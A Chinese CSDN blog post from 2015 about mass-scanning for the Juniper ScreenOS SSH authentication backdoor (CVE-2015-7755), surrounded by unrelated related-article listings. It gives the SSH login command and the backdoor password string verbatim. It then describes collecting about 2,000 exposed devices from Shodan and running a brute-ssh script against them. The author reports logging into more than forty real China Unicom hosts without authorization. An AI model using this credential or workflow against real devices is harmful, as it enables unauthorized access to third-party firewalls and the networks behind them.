Juniper NetScreenOS 后门简易批量扫描

最新推荐文章于 2024-04-16 11:19:22 发布
最新推荐文章于 2024-04-16 11:19:22 发布
阅读量1.7k 收藏
点赞数
分类专栏: 渗透测试 文章标签: juniper 后门 ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cd_xuyue/article/details/50379083
版权

事件介绍

http://bobao.360.cn/news/detail/2514.html

受影响版本

6.2.0r15 到6.2.0r18
6.3.0r12 到 6.3.0r20

分析

https://community.rapid7.com /community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor


后门口令

ssh root@10.10.10.10

然后输入口令:
<<< %s(un='%s') = %u

2015-12-22 11:55:58屏幕截图

批量验证

使用shodan搜索,2000余台设备

2015-12-22 11:57:13屏幕截图


导出结果文件,并使用脚本批量验证是否存在后门口令

2015-12-22 11:59:23屏幕截图

以上所有文件在我的github可下载

https://github.com/Xyntax/exps/tree/master/juniperOS-backdoor


shodan导出格式选择xml

然后使用getIP脚本将导出数据解析成ip列表(存入/dict/ip),将后门口令存入(/dict/password)

使用python brute-ssh即可批量验证,结果存储在(/log/sshd)


注:脚本扫描结果未去重


对org为联通的500个ip进行扫描,结果发现有四十多台主机可以登入

2015-12-22 12:06:58屏幕截图


修复

http://puluka.com/home/techtalknetworking/screenoscriticalsecurityissue2015.html

参考

http://zone.wooyun.org/content/24531


Xyntax
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
juniper os
04-22
juniper老版本的系统 大家需要下载吧
Juniper Netscreen ScreenOS NS-204 NS-208
01-28
Juniper Netscreen ScreenOS NS-204 NS-208 ns200.5.4.0r26.0
安全预警:国内超过300台juniper网络设备受后门影响
weixin_34292287的博客
03-08 305
mickey · 2015/12/23 17:120x00. 事件回顾在2015年的12月18日,Juniper官网发布安全公告,指出在他们的Netscrren防火墙的ScreenOS软件中发现未授权的代码,其中涉及2个安全问题,一个是在VPN的认证代码实现中被安放后门,允许攻击者被动解密VPN的流量(CVE-2015-7756),另一个后门是允许攻击者远程绕过SSH和Telnet认证,利用后门密...
网络靶场实战-Juniper SRX远程代码执行漏洞复现分析
最新发布
蛇矛实验室
04-16 954
首先是未授权文件上传漏洞,我们可以通过poc快速定位到webauth_operation.php文件中,php使用了includes/sajax.php文件,并调用了sajax_init()和sajax_handle_client_request()函数。在sajax_handle_client_request函数的末尾,我们可以看到"$internal_functions"变量,通过打印变量中user的值,我们可以获取150个单独的功能,其中对于我们比较重要的就是文件上传和写入的功能了。
CVE-2015-7755: Juniper ScreenOS Authentication Backdoor
Nixawk
12-21 1741
On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinc
Backdooring Juniper Firewalls
瞎几把学
01-16 1709
Title : Backdooring Juniper FirewallsAuthor : Graeme ==Phrack Inc.== Volume 0x0d, Issue 0x42, Phile #0x05 of 0x11|=---------------------------------------------------------------------
Juniper netscreen SSG5 SSG20固件ssg5ssg20.6.2.0.r13.0.zip
10-25
**Juniper Netscreen SSG5 SSG20固件更新指南** Juniper Networks的Netscreen SSG5和SSG20系列是企业级防火墙和安全设备,为中小型企业提供全面的安全防护。这些设备的核心在于其固件,它包含了操作系统、安全策略...
Juniper netscreen基础培训 ppt
08-27
1.1Juniper防火墙基础.ppt 1.2Juniper防火系统管理.ppt 1.3Juniper防火墙透明模式.ppt 1.4Juniper防火墙路由模式.ppt 2.1Juniper防火墙基本安全策略.ppt 2.2Juniper防火墙高级安全策略.ppt 2.3Juniper防火墙...
Juniper netscreen ssg5-sh.6.3.0r23备份固件.rar
03-04
1、此系统镜像是从实体机SSG5-SH备份出来的,拿出来供有需要的人士,这版本的VPN功能稳定,正使用中。 2、实体机查看: Product Name: SSG5-Serial ........ Software Version: 6.3.0r23.0, Type: Firewall+VPN ...
JuniperNetScreen5gtOS
11-09
NetScreen 5GT最新的OS,具备DDNS功能,让老机器具备新功能,让你的防火墙如虎添翼。在升级你的OS时,请注意备份你防火墙的配置。
Juniper ssg5 ssg20 os 6.3 r17
06-04
Juniper ssg5 ssg20 os 6.3 r17
小草淘宝客 v5.0
10-23
小草淘宝客是以php+MySQL进行开发的淘宝客程序,它满足了一般淘宝客的日常需求,且软件为免费版本。程序特点:1、程序免费使用,无授权、无时间限制。2、百分百开源,无任何加密,自由开发!3、网站SEO、单品SEO,最好优化的淘客程序。4、含文章系统。填充网站内容,助力SEO。5、用户注册、签到系统。6、广告位管理系统。7、轻量级程序,占用资源少,运行速度更快!
ScreenOS 6.2.0r5.0 of netscreen 5gt
09-16
ScreenOS 6.2.0r5.0 of netscreen 5gt
Safe3网站后门扫描工具 v4.1.1.zip
07-14
Safe3网站后门扫描工具是国内率先推出的一款绿色完全免费的web代码查杀软件,独创的智能扫描技术能有效扫描asp、php、jsp、aspx等多种WebShell,弥补了通常杀毒软件不能完全查杀WebShell的不足,给广大站长带来了福音. Safe3网站后门扫描工具 v4.1.1更新内容: 1.大幅减少误报 2.增强webshell查杀功能
速修复!Juniper Junos OS 漏洞使设备易受攻击
smellycat000的专栏
08-21 563
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络硬件公司 Juniper Networks 发布“周期外”安全更新,修复位于 Junos OS的 J-Web 组件中的多个漏洞。攻击者可组合利用这些漏洞在易受攻击设备上实现远程代码执行。这四个漏洞的CVSS评分均为 9.8,属于“严重”漏洞,影响 SRX 和 EX 序列上 Junos OS 所有版本。2023年8月17日,Juniper 公司...
严重漏洞可导致 Juniper 设备遭劫持或破坏
smellycat000的专栏
04-19 365
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码安全卫士网络和网络安全解决方案提供商 Juniper Networks 最近修复了一个严重漏洞,可导致攻击者远程劫持或破坏受影响设备。...
Juniper Junos OS 高危漏洞影响企业网络设备
smellycat000的专栏
10-31 674
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Juniper Networks设备中存在多个高危漏洞,其中一些可用于实现代码执行。Octagon Networks公司的研究员 Paulos Yibelo指出,其中最主要的漏洞是位于 Junos OS J-Web 组件中的远程预认证PHP文档文件反序列化漏洞(CVE-2022-22241,CVSS评分8.1)。Yibelo 在报告中提到,“未认...
Juniper Junos DoS漏洞CVE-2017-2345 10.2及相关产品和平台均受影响
weixin_34279184的博客
09-01 319
近日,Juniper发布公告称,Juniper Junos出现DoS漏洞(CVE-2017-2345),问题出在snmpd 守护进程,攻击者通过精心构造的数据包可导致DoS攻击,而且还可能以某种形式进行远程代码执行。该漏洞影响Juniper Networks Junos OS 10.2及相关产品和平台。 Juniper Junos DoS漏洞CVE...
juniper JMS apt security
04-08
"这篇文档是关于Juniper Identity Management Service的用户指南,主要涉及该服务的安全性和相关配置。" 本文档是Juniper Networks针对其身份管理服务(Juniper Identity Management Service)发布的用户指南,发布...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值